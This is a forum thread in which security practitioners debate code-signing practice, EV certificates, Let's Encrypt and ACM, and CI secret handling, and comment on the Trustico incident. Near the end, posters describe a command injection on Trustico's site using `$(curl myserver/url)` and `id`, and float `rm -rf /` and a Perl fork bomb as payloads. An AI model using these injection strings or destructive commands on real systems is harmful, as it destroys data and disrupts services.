incoherent
Apr 24, 2004

01010100011010000111001
00110100101101100011011
000110010101110010

Wiggly Wayne DDS posted:

you should at least include their public meltdown over it https://groups.google.com/forum/#!topic/mozilla.dev.security.policy/wxX4Yv0E3Mk

it is v standard to revoke a compromised private key, usually someone just submits a signed message as proof but it's great that the ceo was so enthusiastic about proving they had the keys in an easily accessible format

insane CEO posted:

though now DigiCert appears to be influenced by the Symantec management team...

Jesus loving christ. Just trying to wrap my head around the need for a massive 50k+ revocation.


RFC2324
Jun 7, 2012

http 418

Potato Salad posted:

Getting a signing cert from a public CA for your AD Enterprise root trust is relatively involved. You should be point, and ask your clients for info/verification as needed. Your clients may get it wrong and torch cash on a useless cert.

I'm assuming from context clues that you're wanting the root AD CS cert to be publicly recognizable. There's no particular reason to not just make a one-off 4096 root enterprise cert if none of this needs to be trusted externally.

Actually, I'm looking at starting a small hosting business for technophobe business owners who don't want to do business with anyone they can't sit and have a beer with. The deal is basically that I would handle their internet presence for a monthly fee.

I don't want to run into a situation where someone is unhappy with my service but will have trouble moving to someone else, since a large part of the reason the market exists is shady web devs holding their online presence hostage so they keep getting paid to do nothing more than keep the site alive with no updates. Some of these people have been paying $200+ a month to people who haven't updated their sites in years.

Daman
Oct 28, 2011

EssOEss posted:

Oh, I see what you mean - it is the equivalent of the lock icon on the address bar that tells you the website is trustworthy, right? That makes a lot of sense. Code signing says the exe is known good, just like seeing the lock icon means it is safe to enter my passwords onto that website.

ya you're being sarcastic but actually yes, the green lock happening when you go on google.com means they absolutely trust everything that's getting sent to your browser.

just like when you do code signing, you have to absolutely put your company's name behind that signed binary being your product.

consumers don't care about fuckups, sure, but you're a lovely company if you don't try to avoid fuckups.

Docjowles
Apr 9, 2009

RFC2324 posted:

Question about this. If I am doing hosting for extremely non-technical people who still own the domain themselves, what steps would need to be taken to get a CA to issue a cert to me in their name?

I don't want to own any of this poo poo so that divesting myself of it is easier, just hand over the keys to the business owners/their new tech people.

If by "hosting" you mean web hosting, it's trivial. Unless they want an EV cert, which becomes a pain in the rear end of having to provide physical legal documents and be able to accept phone calls from the CA at random times of day and poo poo. Compare what your browser shows in the URL bar for this dumbass forum vs PayPal.com.

For a low level green padlock in the browser cert, you just have to demonstrate control of the domain. This is usually done by creating some DNS TXT record with an arbitrary value specified by the CA, or being able to upload a document containing some arbitrary content to the path they specify. If you can do that, you can get a cert issued for their domain. It won't be owned by or associated with you, personally, in any way.
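For the curious, those two validation methods correspond to the ACME HTTP-01 and DNS-01 challenges; a minimal sketch of where the challenge values live (the token below is a made-up placeholder — a real CA issues a random one):

```python
# Sketch of where ACME domain-validation challenges live, per RFC 8555.

def http01_path(token: str) -> str:
    """HTTP-01: the CA fetches this path on the domain over port 80."""
    return f"/.well-known/acme-challenge/{token}"

def dns01_record(domain: str) -> str:
    """DNS-01: the CA looks up a TXT record at this name."""
    return f"_acme-challenge.{domain}"

print(http01_path("evaGxfADs6pSRb2LAv9IZ"))
# /.well-known/acme-challenge/evaGxfADs6pSRb2LAv9IZ
print(dns01_record("example.com"))
# _acme-challenge.example.com
```

Either way, the only thing proven is control of the domain at validation time, which is exactly why the issued cert isn't tied to you personally.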

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...
Wasn't there some user testing showing that users gave exactly zero fucks about EV and mostly didn't even know that it existed?

The Fool
Oct 16, 2003


I don’t have any links, but I’ve heard that in a few places.


People have been harping on the ‘s’ and the padlock so much, that most users don’t even notice the EV or understand what it means.

Volguus
Mar 3, 2009

The Fool posted:

I don’t have any links, but I’ve heard that in a few places.


People have been harping on the ‘s’ and the padlock so much, that most users don’t even notice the EV or understand what it means.

A former boss of mine complained that the latest website I launched for the company only had a green lock in the address bar and didn't show the company name like PayPal's does. I showed him how much that would cost and what is involved ... the green lock alone is fine.

apseudonym
Feb 25, 2011

Volmarias posted:

Wasn't there some user testing showing that users gave exactly zero fucks about EV and mostly didn't even know that it existed?

EV provides no additional security, it's just a way to charge customers more for certs.

RFC2324
Jun 7, 2012

http 418

Docjowles posted:

If by "hosting" you mean web hosting, it's trivial. Unless they want an EV cert, which becomes a pain in the rear end of having to provide physical legal documents and be able to accept phone calls from the CA at random times of day and poo poo. Compare what your browser shows in the URL bar for this dumbass forum vs PayPal.com.

For a low level green padlock in the browser cert, you just have to demonstrate control of the domain. This is usually done by creating some DNS TXT record with an arbitrary value specified by the CA, or being able to upload a document containing some arbitrary content to the path they specify. If you can do that, you can get a cert issued for their domain. It won't be owned by or associated with you, personally, in any way.

I don't need EV, I just think everything should be https, so that's cool. Next step is to figure out how to set up Let's Encrypt on AWS for the people I can't convince to buy a long-term cert.

The Fool
Oct 16, 2003


apseudonym posted:

EV provides no additional security, it's just a way to charge customers more for certs.

An EV cert provides an extra layer of proof that you are who you say you are. It should theoretically make it harder for playpal.com to spoof PayPal.com.



But as mentioned no-one pays attention to EV tags.

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

bitprophet posted:

Do you mean specifically hardening the Jenkins servers/services themselves, or securing the overall workflow? Your 2nd comment implies you're at least thinking about the latter, in which case you should take a look at secrets management systems like Vault. Having a tool in charge of distributing & rotating secrets, and enforcing that they are on short-lived leases, is a big step up from "meh I just dropped my, or a similarly long-lived, AWS API secret into Jenkins' config, now an attacker gets to be god forever if they break in". Instead, they only get to be god for, say, 15 minutes, or an hour, instead of retaining those privileges for weeks/months until they're ready to leverage them.

Related, it doesn't require use of a secrets store (tho they often make the process easier) but another relatively low hanging fruit option is to follow principle of least privilege and only give Jenkins API keys that do exactly and only what it really needs to do.

You may think "ugh, my deployment needs instance creation, listing, modification and termination, plus all the same for volumes, plus most of that for AMIs, and ... being explicit is too much work, I'm just gonna give it a full admin role." Resisting that temptation and handing out only what you need, means that if Jenkins starts working for the enemy it doesn't have e.g. the ability to assign admin privileges to other users, or destroy backups, or etc. An attacker that can nuke instances is one thing, an attacker that can lock you out of the system or create a quietly unnoticed backdoor is much worse.

I'm talking about securing the overall workflow.

For most of the systems I'm talking about, they're native to one cloud platform provider or another, and they provide decent management infrastructure. For instance, in AWS, I don't bake creds into the system; it gets an IAM role and manages its own temporary credentials (with EC2 systems manager as a pretty decent secret store). And sure, I follow the principle of least privilege and enumerate everything the deployment automation can do - but a deployment automation system, by definition, is going to be able to affect everything I care about.

Jenkins or whatever other orchestration system might not be able to affect its own environment, but it's still going to be able to put code onto what I really care about : the application servers (or configs for "serverless" services, or whatever) that talk to the world, and whatever data stores they're using. The Jenkins environment going down, even if it's totally unrecoverable, isn't that bad an outcome. The real nightmare is somebody using production systems to serve coinhive.js or whatever malware to end users. I'm not in a PCI/HIPAA/whatever space right now, but obviously there are even worse outcomes when you're dealing with sensitive personal data.

Has anybody managed to actually crack this nut in a way that's manageable, lets application developers automate a decent chunk of their own infrastructure deployment (ideally with CFN/ARM/etc type templating), and doesn't give anybody with the ability to crack open an orchestration system godlike powers?

RFC2324 posted:

I don't need EV, I just think everything should be https, so thats cool. Next step is to figure out how to setup lets encrypt on AWS for the people I can't convince to buy a long term cert.

ACM certs are free and rotate themselves seamlessly. As long as you're OK with Amazon lock-in, terminating TLS at the load balancer, and never getting to touch the private key yourself, they are really, really good.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

cheese-cube posted:

I might not be remembering this properly but I'm pretty sure those are screenshots anthonypants took around the time of the Sony Pictures breach when private keys for code-signing certs were found amongst the data released and anthonypants used them to sign an executable. The issue here is that the cert is issued by a trusted root CA so clients would have no issues with accepting it.
Someone found some Sony code-signing certs in the Sony dump, discovered that the key file's password was the same as its filename, used it to sign the malware executable that hit Sony, and uploaded that to VirusTotal.

apseudonym
Feb 25, 2011

The Fool posted:

An EV cert provides an extra layer of proof that you are who you say you are. It should theoretically make it harder for playpal.com to spoof PayPal.com.



But as mentioned no-one pays attention to EV tags.

That major players don't bother with EV and that nothing technically gives a gently caress about it is pretty clear evidence.

Rufus Ping
Dec 27, 2006





I'm a Friend of Rodney Nano

RFC2324 posted:

Next step is to figure out how to setup lets encrypt on AWS

just use ACM

RFC2324 posted:

for the people I can't convince to buy a long term cert.

what is a "long term cert" and why would you use one over LE?

RFC2324
Jun 7, 2012

http 418

Rufus Ping posted:

just use ACM


what is a "long term cert" and why would you use one over LE?

Looking at ACM now. I initially thought you could only use it with DNS registered through Route 53; I see I was wrong.

And long term as in purchased for a year or 2 vs having to renew every 90 days with LE. I know you can automate LE but it's still easier to just buy a traditional 1 year cert, especially when you are dealing with clients who tend to lag behind and distrust anything new.

It's gonna be a fascinating bit of work talking to these people, they have never even heard of the cloud.
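Since LE certs only live 90 days, the usual failure mode is a renewal silently breaking; a small stdlib-only sketch for keeping an eye on expiry (the host passed in is whatever you're hosting — nothing here is specific to LE or AWS):

```python
# Stdlib-only sketch: how many days remain on a host's TLS cert.
# Handy for watching Let's Encrypt's 90-day renewal cycle.
import socket
import ssl
from datetime import datetime, timezone

def parse_not_after(not_after: str) -> datetime:
    """Parse the 'notAfter' string from ssl.getpeercert(),
    e.g. 'Jun  1 12:00:00 2025 GMT'."""
    dt = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z")
    return dt.replace(tzinfo=timezone.utc)

def days_until_expiry(host: str, port: int = 443) -> float:
    """Connect, grab the peer cert, return fractional days remaining."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    delta = parse_not_after(cert["notAfter"]) - datetime.now(timezone.utc)
    return delta.total_seconds() / 86400
```

Wire something like this into monitoring and an expired cert becomes an alert instead of a client phone call.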

The Fool
Oct 16, 2003


RFC2324 posted:

And long term as in purchased for a year or 2 vs having to renew every 90 days with LE. I know you can automate LE but it's still easier to just buy a traditional 1 year cert, especially when you are dealing with clients who tend to lag behind and distrust anything new.

LE is better, get with the times.

EssOEss
Oct 23, 2006
128-bit approved

Daman posted:

ya you're being sarcastic but actually yes, the green lock happening when you go on google.com means they absolutely trust everything that's getting sent to your browser.

just like when you do code signing, you have to absolutely put your company's name behind that signed binary being your product.

consumers don't care about fuckups, sure, but you're a lovely company if you don't try to avoid fuckups.

I agree absolutely - digital signatures are there to prove who something came from. That's not the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's not the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

What you're saying is that you plan to be untrustworthy, and your users should accept that.

The point of a signed binary release is that it says, "this is a legitimate piece of software put out by EssOEss; if you trust that person/company/OU, then you can trust this software."

What you want to do is turn that statement into, "this came from my automated build pipeline, gently caress if I know what's in there, but good luck."

The equivalent in a web context is Facebook allowing people to deploy random poo poo straight from source control to a public-facing server with a *.facebook.com cert and key.

Space Gopher fucked around with this message at 08:24 on Mar 1, 2018

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's not the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.
It sounds like what you want is a file hash. Code signing certificates is something else.
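The file-hash suggestion is a few lines of stdlib; a minimal sketch:

```python
import hashlib

def sha256_of_file(path: str) -> str:
    """Hex SHA-256 digest of a file, read in chunks to bound memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()
```

Publishing a digest like this next to a download lets users verify the bytes are intact, but says nothing about who produced them — that's exactly the gap a signature (and the identity behind it) is supposed to close.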

Jabor
Jul 16, 2010

#1 Loser at SpaceChem
Honest question, why do you actually want to have these builds signed?

Frivolous Sam
Apr 15, 2001

The aliens might be coming, THE ALIENS MIGHT BE COMING.

EssOEss posted:

I agree absolutely - digital signatures are there to prove who something came from. That's not the claim that was made in the above discussion, though, which was that having a digital signature means that software is "tested" or "validated" and implies something positive security-wise about it.

This is, however, absolute fantasy - just like a lock does not mean to the user that you can shove your password onto the website, signed code does not make it secure. What is trusted is the identity, not the fact that something is signed. You should not install drivers signed by Beanie Babies LLC just like you should not put any passwords into https://facebook.notascammer.ipromise.ru even if it has a pretty green lock.

You're right about the principles, but not their application.

Code signing only proves who signed something and that it hasn't been changed since signing.

However for that to be useful in the real world it matters whether the org who signed it is trustworthy.

Having proper processes so you know only good code gets signed by you makes you trustworthy. Otherwise everyone should be telling your users not to trust anything signed by you and what's the point of the certificate?
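Those two properties — untampered bytes, known signer — fall straight out of any signature scheme; a toy sketch using the third-party `cryptography` package (this is an illustration, not anyone's actual release tooling):

```python
# The two things a signature proves: (a) these exact bytes, (b) this key.
# Requires the third-party 'cryptography' package (pip install cryptography).
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

key = Ed25519PrivateKey.generate()
code = b"print('hello world')"
sig = key.sign(code)

pub = key.public_key()
pub.verify(sig, code)  # passes silently: untampered, right signer
try:
    pub.verify(sig, code + b" # evil")  # one changed byte breaks it
except InvalidSignature:
    print("tampered build rejected")
```

Note what the math does not prove: that the signed bytes were any good. That part is entirely the org's processes, which is the point being argued here.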

EssOEss
Oct 23, 2006
128-bit approved

Space Gopher posted:

The point of a signed binary release is that it says, "this is a legitimate piece of software put out by EssOEss; if you trust that person/company/OU, then you can trust this software."

I agree.

Space Gopher posted:

What you want to do is turn that statement into, "this came from my automated build pipeline, gently caress if I know what's in there, but good luck."

This seems to be an exaggeration. Of course I know and trust what is in there - why would I not? The mere fact that I do not want to implement some bothersome "user has to manually unlock signing key every 24 hours" process or some bureaucratic auditing scheme (that would become a pointless formality once the person doing it gets fed up) does not mean that my build pipeline is suddenly filled with malware.

I accept the risk that if that happens, it would be hard to notice fast enough, but that does not mean it is going to happen. Indeed, a large part of the reason I accept the risk is that the probability is almost infinitesimally low.

Space Gopher posted:

The equivalent in a web context is Facebook allowing people to deploy random poo poo straight from source control to a public-facing server with a *.facebook.com cert and key.

Yes, that seems to be more or less a fair analogy. Facebook's threat model is obviously very different, so it is perhaps not a very useful parallel, but I can see the similarity in principle.

Jabor posted:

Honest question, why do you actually want to have these builds signed?

Most importantly, app store requirements that require code signing.

Second, some of the signed code are PowerShell scripts, and PowerShell in certain configurations requires scripts to be signed. Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

I also consider it general good practice to identify cryptographically who binaries originate from, so I would do it even without the above requirements if it were simple enough (which it mostly was, until GlobalSign announced they require some human action related to a token to actually do signing).

Frivolous Sam posted:

Having proper processes so you know only good code gets signed by you makes you trustworthy. Otherwise everyone should be telling your users not to trust anything signed by you and what's the point of the certificate?

Sure. However, proper processes can be "keep the system updated and do not allow random people Git commit access" and similar. They do not need to include overburdened auditing or "have to literally press button on USB token plugged into back of server" steps.

EssOEss fucked around with this message at 09:08 on Mar 1, 2018

SeaborneClink
Aug 27, 2010

MAWP... MAWP!

EssOEss posted:

Most importantly, app store requirements that require code signing.

Yep, they do, in fact.

EssOEss posted:


Second, some of the signed code are PowerShell scripts, and PowerShell in certain configurations requires scripts to be signed. Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

I sure can't imagine a build pipeline in which you're both compiling code in Swift/Objective-C and PowerShell. Maybe you can shed some light on what unique scenario requires both binary and code signing.

EssOEss posted:

proper processes can be "[...] not allow random [...] Git commit access" and similar.

Almost like signing every test build with your public cert? Crazy...

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

EssOEss posted:

I do not accept this definition. A signature says who the code came from, that is all. What is the logic here? If you draw other implications from this signature, your security model is a bit dubious.

EssOEss posted:

Second, some of the signed code are PowerShell scripts, and PowerShell in certain configurations requires scripts to be signed. Mostly people seem to just disable that requirement, but I try to do what I can to help people avoid disabling security features to get on with their job.

:thunk:

Wiggly Wayne DDS
Sep 11, 2010



that you're having trouble getting a cert in the first place should tell you that your understanding of risk is below the most bottom of the barrel reseller in the world

that you don't re-evaluate but instead double down that, actually, everyone else is wrong is why no one's going to ever take you seriously

if you ever get a code signing cert please keep us informed, it's good to know who to blacklist

SeaborneClink
Aug 27, 2010

MAWP... MAWP!

Wiggly Wayne DDS posted:

that you're having trouble getting a cert in the first place should tell you that your understanding of risk is below the most bottom of the barrel reseller in the world

that you don't re-evaluate but instead double down that, actually, everyone else is wrong is why no one's going to ever take you seriously

if you ever get a code signing cert please keep us informed, it's good to know who to blacklist

Mr. Trustico may be up for parts soon. Perhaps we'll see Mr. EssOTrustiEss.

Hey pro-tip, don't email anyone the key you're signing your Jenkins based iOS or PowerShell builds with.

Potato Salad
Oct 23, 2014

nobody cares


SOS, can....you post a hash of your company's name? I don't want to see you outed for autosigning builds, I just want to make sure that I don't do business with your company.

Thanks Ants
May 21, 2004

#essereFerrari


https://twitter.com/svblxyz/status/969220402768736258

:tif:

The Fool
Oct 16, 2003


https://twitter.com/geofft/status/968937746214596610?s=21

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

https://twitter.com/cujanovic/status/969229397508153350

apseudonym
Feb 25, 2011


Don't touch the poop thread

Space Gopher
Jul 31, 2006

BLITHERING IDIOT AND HARDCORE DURIAN APOLOGIST. LET ME TELL YOU WHY THIS SHIT DON'T STINK EVEN THOUGH WE ALL KNOW IT DOES BECAUSE I'M SUPER CULTURED.

EssOEss posted:

I agree.


This seems to be an exaggeration. Of course I know and trust what is in there - why would I not? The mere fact that I do not want to implement some bothersome "user has to manually unlock signing key every 24 hours" process or some bureaucratic auditing scheme (that would become a pointless formality once the person doing it gets fed up) does not mean that my build pipeline is suddenly filled with malware.

I accept the risk that if that happens, it would be hard to notice fast enough, but that does not mean it is going to happen. Indeed, a large part of the reason I accept the risk is that the probability is almost infinitesimally low.

The point is to have a system that's resilient against compromise, at least a little bit.

Say I'm some evil malicious hacker who breaks into your build system from some faraway place. Maybe I'm the guy who owns https://facebook.notascammer.ipromise.ru. I know, you don't think it could ever happen, just like everybody else who's ever been compromised, but I've got control of your build system and a burning desire to steal your identity and compromise your users.

If you have automated code signing with the same cert you use for releases, that's it, I win. I can sign anything I please by pushing it to your build system. As far as the world knows, it's totally legit and you've signed off on it.

If you have automated code signing with an internal-only cert, and a separate system for signing release builds that puts a human in the loop to push a button, then my job gets a whole lot harder. I need to somehow socially engineer someone in your organization into pushing the "release" button when there's not actually a release, or wait and pray that you don't find the intrusion before your next release and whatever secret-ingredient scripting I've dropped into your pipeline works as expected the first time. Maybe I can still do that, but you get another significant chance to stop me before I get to what I want and you get your fifteen minutes of fame on security twitter and Ars Technica.
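A toy sketch of that two-tier split — every name and flag here is hypothetical, purely to show the control flow being described:

```python
# Toy model of two-tier code signing: automated CI signing uses an
# internal-only cert; the release cert refuses to sign without a human.

class SigningError(Exception):
    pass

def sign(artifact: bytes, release: bool, human_approved: bool = False) -> str:
    if not release:
        # CI/test builds: fully automated, but with an internal-only
        # cert that no customer machine trusts.
        return f"signed({len(artifact)}B, cert=internal-ci)"
    if not human_approved:
        # The release cert never signs without a person in the loop.
        raise SigningError("release signing requires manual approval")
    return f"signed({len(artifact)}B, cert=release)"
```

An attacker who owns the build system now gets only internal-cert signatures for free; reaching the release cert means fooling a human, which is the extra tripwire being argued for.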

apseudonym posted:

Don't touch the poop thread

Somebody already did; trustico.com is 503ing.

e: according to the twitter thread it was executing the injected commands as root, too. jesus christ.

Space Gopher fucked around with this message at 16:52 on Mar 1, 2018

Farmer Crack-Ass
Jan 2, 2001

this is me posting irl

Space Gopher posted:

Say I'm some evil malicious hacker who breaks into your build system from some faraway place. Maybe I'm the guy who owns https://facebook.notascammer.ipromise.ru. I know, you don't think it could ever happen, just like everybody else who's ever been compromised, but I've got control of your build system and a burning desire to steal your identity and compromise your users.

He already covered this:

EssOEss posted:

No auditing - that would indeed be too much of a hassle. If someone infiltrated the system and got my build process to sign their malicious code, I doubt I would ever notice (maybe if Windows Defender catches it by coincidence during the signing process). I accept this risk.


EDIT: I'm curious, EssOEss, what does your company do?

Farmer Crack-Ass fucked around with this message at 17:33 on Mar 1, 2018

ChubbyThePhat
Dec 22, 2006

Who nico nico needs anyone else

Marvelous.

vanity slug
Jul 20, 2010

Farmer Crack-rear end posted:

EDIT: I'm curious, EssOEss, what does your company do?

Maybe they're an SSL Reseller.

Boris Galerkin
Dec 17, 2011

I don't understand why I can't harass people online. Seriously, somebody please explain why I shouldn't be allowed to stalk others on social media!

I don't get it. Can someone explain.

e: vvv Okay thanks. Yeah that does sound bad. vvv

e2: So like, is it possible, in theory of course, to just send it a `rm -rf /` command? Or hell,

perl -e "fork while fork" &

?

Boris Galerkin fucked around with this message at 20:26 on Mar 1, 2018

bitprophet
Jul 22, 2004
Taco Defender
First quoted Twitter user found that Trustico's website is executing untrusted user input in the shell (entering a "domain name" of $(curl myserver/url) results in that fella's myserver site getting curl'd).

Second quoted Twitter user piggybacks on that to prove, by updating the injected shell command to include the output of another subcommand (id, which spits out the running user's name and UID), that not only is Trustico executing untrusted user input...they're executing it as root.
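For anyone following along, the bug class here is plain shell injection; a minimal sketch of the unsafe vs. safe pattern (the hostile "domain" mirrors the tweets and is of course made up):

```python
# Shell injection in miniature: $(...) is expanded by the shell, so
# interpolating user input into a shell string hands the user a shell.
import subprocess

domain = "$(id)"  # hostile "domain name" like the one in the tweets

# UNSAFE: if this string were run with shell=True, the shell would
# execute `id` before echo ever saw an argument.
unsafe = f"echo {domain}"
print("would execute:", unsafe)

# SAFER: pass an argument vector with no shell involved; $(id) stays
# a literal string, never a subcommand.
out = subprocess.run(["echo", domain], capture_output=True, text=True)
print(out.stdout.strip())  # prints the literal text $(id)
```

Same fix applies in any language: never build a shell command string out of user input, and never do the execution as root.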

All the facepalms.

EDIT: one more facepalm, courtesy of me using code instead of fixed

Stanley Pain
Jun 16, 2001

by Fluffdaddy
It's only freakin March. :gonk:

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
There's a lot of false things in this thread mixed in with the guesses


The Fool
Oct 16, 2003


anthonypants posted:

There's a lot of false things in this thread mixed in with the guesses

What's actually false? I thought it was a reasonable best-guess summary of the chain of events.

Although I suppose I should know better than to trust something retweeted by Taylor Swift
